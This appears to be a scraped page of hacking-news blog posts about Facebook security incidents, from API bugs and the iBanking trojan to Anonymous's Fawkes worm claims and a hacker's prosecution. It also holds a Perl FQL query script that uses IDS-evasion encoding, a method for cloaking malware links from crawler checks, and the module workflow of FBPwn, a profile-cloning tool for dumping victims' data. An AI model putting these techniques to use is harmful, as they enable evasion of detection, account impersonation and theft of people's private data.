Hacking Any Facebook Accounts using REST API

Stephen Sclafani , a Security Researcher, has discovered a critical security vulnerability in the Social Networking giant Facebook that allowed him to hack any facebook accounts.

Stephen just need your user ID, he can hack into your account and read private messages, view email addresses, create or delete notes, on top of that he can update status and upload photos and tag you friends,  on behalf you. 

"A misconfigured endpoint allowed legacy REST API calls to be made on behalf of any Facebook user using only their user ID" Stephen explained in his blog.

The Facebook REST API is said to be predecessor of Facebook’s current Graph API.  He managed to send request to server using this API such that it will update status on behalf of victim.


Stephen found this bug in April 23 and reported to Facebook.  After getting notification, Facebook permanently fixed the bug on April 30th. Facebook awarded $20,000 bounty to him for finding and reporting this bug.

Android malware iBanking helps attackers to hack Facebook account

An attacker can't hack a facebook account which has enabled two-step authentication, even if he know the username and password.  But, if you think Two-Step authentication is enough to keep your faebook account safe from hackers, Think Again!

Cyber criminals have started to use Android Banking Trojan "iBanking" to bypass Facebook's two-factor verification.

iBanking is malicious android application capable of intercepting SMS messages, forwarding incoming voice calls to any number and record victim's voice using mic.

Recently, RSA noted the release of source code for the iBanking trojan.  This source code leak helped other cyber criminals to customize this trojan according to their needs.

ESET reports that a customized iBanking malware targeting Facebook users is being delivered via a new variant of Computer Banking Trojan Qadars 

When a system is infected with Qadars Trojan, it will show a message when user is logging into Facebook telling them "Facebook introduces new extra safety protection system" and instructs them to install an android app.  This app will help cybercriminals to intercept SMS so that they can bypass the Facebook's two-factor verification.

"The way iBanking is installed on the user’s mobile is quite common, but it is the first time we have seen such a mobile application targeting Facebook users for account fraud." Researchers said.

Facebook Hack: vulnerability allows attacker to launch DOS attack against any user


Chris C. Russo, Security expert, has discovered critical vulnerability in the Facebook Chat module that allows an attacker to launch Denial of Service (DOS) attack against any Facebook users.

He discovered a security flaw on 'www.facebook.com/ajax/mercury/send_messages.php' specifically in the parameter 'message_batch[0][body]'. It doesn't have any kind of limit in the amount of characters that can be sent.

So, it is possible for attackers to send a long message that results in DOS condition to a remote user. Since Facebook allows to send message to almost every user, it can be launched against any user.

The researcher has tested the flaw with 3 different testing users. One of the users who use tablet said his tablet got restarted and he is not able to access the Facebook app anymore, since the chat log would remain there and it would make the app crash again.

"In order to prevent this, the length of that parameter should be analyzed *before* sending the information to the addressee user by the asynchronous connection." Researcher said.

"Personally I believe that there must be something wrong with XSRF tokens as well, because it would allow me to send several packets using the same token that I initially extracted,however I couldn't this information due the ban prevention mechanism."

The researcher notified the Facebook before 6 weeks but fb team replied that there is no flaw, So he published the details in seclists.

In the past, he has discovered a security flaw in MSN messenger that allows hacker to send huge amount of big packets cause denial of service.

Ethical Hacker "Glenn Mangham" admits Facebook Hacking



Software development Student from York, Glenn Mangham admitted hacking into the Facebook between April and May of this year, but argued that he only wanted to show Facebook how to improve its security as he had done for Yahoo(Mangham, who had previously been rewarded by Yahoo for finding vulnerabilities in its systems).
Facebook discovered evidence that pointed back to Mangham and he was arrested by the Metropolitan Police Central e-Crime Unit (PCeU) in June.

He hacked into Facebook systems and downloaded “highly sensitive intellectual property”, said prosecutor Sandip Patel.

Mangham's defence has argued that he was an "Ethical Hacker", he was attempting to discover the vulnerabilities so that Facebook can fix it.

"That was his plan here but the activity was found by accident," said barrister Tom Ventham.

Facebook said its users’ personal data was not compromised in the security breach. Mangham will be sentenced on 17 February 2012.

Anonymous says Facebook Fawkes Virus Attack initiated already

Anonymous hackers says they already infected the Facebook with Fawkes Virus. They released a video on youtube. According to the video, the beta testing of this worm is completed.

They claimed that they release this worm on Facebook already, they planned to release this worm on other Social Networks.

Some Anonymous hackers says Fawkes Virus is fake operation and others claimed the attack actually failed.

"The Fifth of November was not "a fail" as many people called it, but [only] the start of the attack. The Fifth of November is only the beginning." Anonymous said in youtube.

The full Transcript of the Video:
Greetings, Citizens of the world.
We are Anonymous.

When corruption and lies are attached with the system and function as one evil form of power, even the machines will side with The people. We are moving towards the new system of political and social functioning and governance in this world. We are moving very rapidly towards achieving that goal. We the people from all over the world are collaborating with each other through the Internet.

We are watching you all and your machines are working for us. The Fawkes Virus is here. It's beta testing has completed and is now a fully armed and operational piece of weaponry. It has already been released on Facebook and will be released on other social networking sites very soon. The Fifth of November was not "a fail" as many people called it, but [only] the start of the attack. The Fifth of November is only the beginning.

You cannot run from us. We have your personal data. We have your psychological profiles. Corrupters will be exploited. The innocent will be deleted. The world will be reclaimed.

The corrupt fear us, the honest support us, the heroic fight with us.

Project Mayhem 2012, engaged.

We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.

The Youtube Video:

On Nov 11th, anonymous hackers claimed they are going to unleash the Fawkes virus. On Nov12th, the BitDefender Safego detected a virus that approximately function like a worm mentioned by Anonymous.

Recently, Facebook is flooded with porn images,some security expert said it might be anonymous attack. But facebook reported that it is "Self-XSS" Social engineering attack.

Indian Accounts were not affected by Spam Attack says Facebook


Across the world, there are lot of Facebook users affected by Facebok spam attack that distribute Porn Images. But Facebook has denied Facebook spam attack in India.

Facebook has 25 million users in India. 2 Lakh peoples reported they are affected by this attack in Bangalore.  However, BA Mahesh, who heads the cyber cell of the Bangalore police says no formal complaints have been received.

"This is not true. Users photos are not being transferred to an unwanted site and no accounts have been compromised, Protecting the people who use Facebook from spam and malicious content is a top priority for us. We are always working to improve our systems to isolate and remove material that violates our terms, and take action on those who is responsible for these types of content." a Facebook executive said.  

BreakTheSecurity Says don't fall for the social engineering attack. If anyone ask you to paste any unknown code in browser , don't do this. Know more about the Self-Xss attack and prevention.


Facebook blames Browser Vulnerability for the pornographic spam Attack


Yesterday, The pornographic spam hits Facebook, Explicit and Violence posted in lot of users wall(without user knowledge).


Facebook have acknowledged for this spam attack.  According to their statement , the attackers exploits the Browser Vulnerability that allows "Self-XSS".

Self-XSS(Cross site Scripting)-An attacker can execute Malicious Javascript code on your browser that bring the access to the whatever website you visit (not only Facebook).

Most of time, the spam message ask you to copy the javascript and enter in the browser url box in order to get something(Eg: Gift card or Facebook Stalker).  This results in executing the Malicious code and results in account hacking or spreading spam message.

It is unclear which browser is vulnerable to .  Hope they will fix it soon.

If you like to know more about Self-XSS Attack, please check here:
Self-XSS, one of Social Engineering Attack.


Anonymous unleashed "Fawkes Virus" worm on Facebook

The Hacktivist group Anonymous unleashed "Fawkes Virus" worm on Facebook server.  The operation named as "Fawkes Virus". They announced this operation via Video on Youtube.

According to the video, "the Fawkes Virus" is worm that sophisticated and a hacked account could open users up to hacks on their hard drives and loss of control over their entire systems. Although it seems firmly rooted in Facebook, the video said that it could be applied to any social network and added, "We did not expect the intensity in which it would spread."

More announcement about the Operation:

Anonymous would like to welcome you to the Fawkes virus which was fully written by Anonymous programmers.


We did not expect the intensity in which it would spread.


After the worm is under control Anonymous will use this to its advantage against corruption and as an alternative attack against its opponents

"I'm a legitimate member of Anonymous. The virus was intended to target FB's servers, and not user accounts, i was simply offering the facts, as opposed to lying. If you spent a bit time to research on how FB handles your data and how it disables thousands of accounts for no reason, FB refuses to take down images of graphic violence, sexual exploitation and animal cruelty off Facebook due to a loophole. If you still don't understand why we target FB then you clearly don't understand Anonymous." AnonSecurity157 commented on Youtube below the video. 




"If it’s not a hoax, it appears to have the characteristics of 2008's KoobFace, but unlike its predecessor it should also receive commands from a remote attacker and simulate “basic actions on Facebook accounts, such as sending a friend request or a message”. The worm could be carried onto other account with little or no interaction, as it allegedly bypasses your application security and automatically sends infected links to the unsuspected contacts in the list of friends."Malware city report says.

"According to the video, the worm is sophisticated and a hacked account could open users up to hacks on their hard drives and loss of control over their entire systems. Although it seems firmly rooted in Facebook, the video said that it could be applied to any social network." theinquirer report says.

Facebook,google+ Vulnerable to bypass content restrictions


Facebook is now vulnerable to bypass content restrictions on links and posts put on a user's public wall. Facebook was notified of these vulnerabilities on July 31st, 2011. To date (October 4, 2011) Facebook has yet to do anything about this So BlackhatAcademy decided to release it in public.

FQL
Simply requiring an API key for privileged queries does not protect facebook from people arbitrarily obtaining one. Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. To access Facebook's FQL API, it takes only a well-formed HTTP request with an embedded API key to return a valid XML object. FQL Does not allow the use of JOINS, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious facebook application or directly on the FQL development api page for information gathering. The implementation below uses LibWhisker2 for IDS evasion via session splicing.


#!/usr/bin/perl
use warnings;
use XML::Simple;
use LW2;
use Getopt::Std;
my %opts;
getopts('q:',\%opts);
my $query = $opts{q} if defined $opts{q};
$query = "SELECT pic_big FROM user WHERE uid=6666666" unless defined $opts{q};
my $ref = fqlQuery($query);
foreach my $parent (sort keys %{$ref}) {
    if (%{$ref->{$parent}}) {
        print "$parent: \n";
        foreach my $key (sort keys %{$ref->{$parent}}) {
            if (%{$ref->{$parent}->{$key}}) {
           print "\t$key : \n";
               foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
                   print "\t\t$mojo : ";
                   print $ref->{$parent}->{$key}->{$mojo};
           print "\n";
           }
            } else {   print "\t$key : ";
               print $ref->{$parent}->{$key};
               print "\n";
            }
        }
    } else {
        print "$parent : " . $ref->{$parent} . "\n";
    }
}
sub fqlQuery {
    my $q = shift;
    $q =~ s/ /%20/g;
    my $link = "http://api.facebook.com/method/fql.query?query=$q";
    my $text = download($link,"api.facebook.com");
    my $ref  = XMLin($text);
    return($ref);
}
sub download
{
    my $uri = shift;
    my $try = 5;
    my $host = shift;
    my %request;
    my %response;
    LW2::http_init_request(\%request);
    $request{'whisker'}->{'method'} = "GET";
    $request{'whisker'}->{'host'} = $host;
    $request{'whisker'}->{'uri'} = $uri;
    $request{'whisker'}->{'encode_anti_ids'} = 9;
    $request{'whisker'}->{'user-agent'} = "";
    LW2::http_fixup_request(\%request);
    if(LW2::http_do_request(\%request, \%response)) {
        if($try < 5) {
            print "Failed to fetch $uri on try $try. Retrying...\n";
            return undef if(!download($uri, $try++));
        }
        print "Failed to fetch $uri.\n";
        return undef;
    } else {
        return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'});
    }
}

Content Forgery
While most major sites that allow link submission are vulnerable to this method, sites including websense, google+, and facebook make the requests easily identifiable. These sites send an initial request to the link in order to store a mirror thumbnail of the image, or a snapshot of the website being linked to. In doing so, many use a custom user agent, or have IP addresses that resolve to a consistant domain name. Facebook IP addresses resolve to tfbnw.net, also set a custom user agent of "facebookexternalhit". Google+ (Also notified Jul. 31st and guilty of reasonable care) again follows suit and utilizes "Feedfetcher-Google" as their user agent. Knowing this, we can easily filter out requests coming from these websites, and offer up a legitimate image to be displayed on their site, while redirecting or displaying a completely different page to anyone that follows the links. Facebook's recent partnership with websense is laughable, due to websense's "ACE" security scanner that is just as easily identified, by using gethostbyaddr in order to resolve the IP back to websense.com. Utilizing this technique, would allow an overwhelming number of malware sites to remain undetected to their automatic site analysis. Other places like digg.com either spoof a user agent to look like normal traffic, or forward the client's user agent, which makes it more difficult to catch every one of their requests. Fortunately, digg.com only requests the link once, prior to submitting the link to the world. This allows attackers to serve up a legitimate image until that initial request clears our server, and then replace it with a less than honest file. We have affectionately named this vulnerability class Cross-Site Content Forgery.

For more info follow this LInk:
http://www.blackhatacademy.org/security101/index.php?title=Facebook

Thailand Prime Minister Twitter, Facebook accounts Hacked

Prime Minister Yingluck Shinawatra's personal Twitter account was hacked yesterday in what officials said was possibly part of a conspiracy to embarrass the government.

The false tweets accused her of cronyism and various failures. The final post read: "If she can't even protect her own Twitter account, how can she protect the country?"

Authorities vowed to prosecute the guilty parties. Information and Communication Technology Minister Anudith Nakornthap said an investigation found the hacker used a prepaid phone card and an iPhone to access the accounts. He denied a report that an arrest was imminent, but said details from the investigation would be announced today.Ms. Yingluck won a clear victory in July, but is accused by her critics of being a puppet of her brother, former Premier Thaksin Shinawatra who was thrown out of office in a 2006 military coup.

GOOGLE | YOUTUBE | MYSPACE | FACEBOOK | GMAIL | BING | MICROSOFT Hacked


Can't Believe this: A Hacker called dr@g has Hacked Guadeloupe  Google / Microsoft/ Motorola / Orange / Facebook / Youtube / Myspace / Live / Hotmail / Bing / Visa / Opera / Gmail / Joomla / Ubuntu / Internet / Bank America and Defaced them. The Hacker is in the team called Moroccain Security Cr3w.
Looks like DNS Hijacking(but not sure).

Hacked Site List:
http://www.google.gp/
http://www.google.com.gp/
http://www.google.net.gp/
http://microsoft.gp/
http://internet.gp/
http://motorola.gp/
http://orange.gp/
http://www.oracle.gp/
http://opera.gp/
http://ubuntu.gp/
http://yahoo.gp/
http://www.facebook.gp/
http://www.youtube.gp/
http://www.bing.gp/
http://www.joomla.gp/
http://www.myspace.gp/
http://www.ciscosystems.gp/
http://www.googleplus.gp/
http://www.gmail.gp/
http://live.gp/
http://bankamerica.gp/

Mirror:

http://www.zone-h.com/mirror/id/14877986
http://www.zone-h.com/mirror/id/14877923
http://www.zone-h.com/mirror/id/14877133
http://www.zone-h.com/mirror/id/14877973
http://www.zone-h.com/mirror/id/14877865
http://www.zone-h.com/mirror/id/14877897
http://www.zone-h.com/mirror/id/14877917
http://www.zone-h.com/mirror/id/14877916
http://www.zone-h.com/mirror/id/14877915
http://www.zone-h.com/mirror/id/14877912
http://www.zone-h.com/mirror/id/14877082
http://www.zone-h.com/mirror/id/14877090
http://www.zone-h.com/mirror/id/14877091
http://www.zone-h.com/mirror/id/14877094
http://www.zone-h.com/mirror/id/14877096
http://www.zone-h.com/mirror/id/14877119
http://www.zone-h.com/mirror/id/14877171
http://www.zone-h.com/mirror/id/14877235
http://www.zone-h.com/mirror/id/14877294
http://www.zone-h.com/mirror/id/14877820
http://www.zone-h.com/mirror/id/14877983
http://www.zone-h.com/mirror/id/14877864



FBPwn ~ A cross-platform Java based Facebook profile dumper



Friends, if you get invitation from stranger in facebook, don't accept it.  Even if you know the person, please verify whether profile is real or not.  A new hacking tool is available that will send friend request to you.  If you accept, it  can steal all info ,photos,friend list from you. Think twice before accepting invitation.

FbPwn: A cross-platform Java based Facebook profile dumper, sends friend requests to a list of Facebook profiles, and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information,photos and friend list to a local folder.

Usage

A typical scenario is to gather the information from a user profile. The plugins are just a series of normal operations on FB, automated to increase the chance of you getting the info.

Typically, first you create a new blank account for the purpose of the test. Then, the friending plugin works first, by adding all the friends of the victim (to have some common friends). Then the clonning plugin asks you to choose one of the victims friends. The cloning plugin clones only the display picture and the display name of the chosen friend of victim and set it to the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls waiting for the friend to accept. As soon as the victim accepts the friend request, the dumper starts to save all accessable HTML pages (info, images, tags, ...etc) for offline examining.

After a a few minutes, probably the victim will unfriend the fake account after he/she figures out it's a fake, but probably it's too late!


ModulesDescription:
All modules work on a selected profile URL (we'll call him bob), using a valid authenticated account (we'll call him mallory).

FBPwn modules are:

- AddVictimFriends: Request to add some or all friends of bob to increase the chance of bob accepting any future requests, after he finds that you have common friends.

- ProfileCloner: A list of all bob's friends is displayed, you choose one of them (we'll call him andy). FBPwn will change mallory's display picture, and basic info to match andy's. This will generate more chance that bob accepts requests from mallory as he thinks he is accepting from andy. Eventually bob will realize this is not andy's account, but probably it would be too late as all his info are already saved for offline checking by mallory.

- CheckFriendRequest: Check if mallory is already friend of bob, then just end execution. If not, the module tries to add bob as as a friend and poll waiting for him to accept. The module will not stop executing until the friend request is accepted.

- DumpFriends: Accessable friends of bob is saved for offline viewing. The output of the module depends on other modues, if mallory is not a friend of bob yet, the data might not be accessable and nothing will be dumped.

- DumpImages: Accessable images (tagged and albums) are saved for offline viewing. Same limitations of dump friends applies.

- DumpInfo: Accessable basic info are saved for offline viewing. Same limitations of dump friends applies.


Student hacker 'penetrated' Facebook

A student hacker successfully “penetrated” Facebook during repeated attempts to illegally access the social networking site’s programmes, a court heard.
In one of the first cases of its kind in Britain, Glenn Steven Mangham, 25, used “considerable technical expertise” to repeatedly bypass security at the world’s dominant social network, it was claimed.

The student, from York, faces five charges, including that he “made, adapted, supplied or offered to supply” a computer program to hack into a Facebook server, Westminster magistrates’ court heard

Police sources described the incidents as one of the first investigations into attempts to illegally access the site, which boasts more than 750 million members worldwide.

One Scotland Yard source told The Daily Telegraph that detectives were not aware of any hacking attempts “to this extent” on the site in Britain. It is understood Mangham does not have a Facebook profile.

Mangham was arrested by officers from the Metropolitan Police’s Central e-Crime Unit in early June on suspicion of “computer hacking offences” before being charged earlier this month.

[source]

Anonymous Aims to Destroy(Hack) the Facebook on Nov 5th-Rumours

Some rumours is spreading over the internet that anonymous is going to kill the Facebook on Nov 5th.  But what anonymous group said this is false hype and Anonymous has no such plans. Even if there are some individuals, they do not represent the whole anonymous

anonymous  Recent Tweets about this Operation:



Facebook killer video scam spreads between social networkers

A new Scam is spreading over the Facebook titled" Facebook killer video".

Here you can see the screen shot of that Facebook Scam.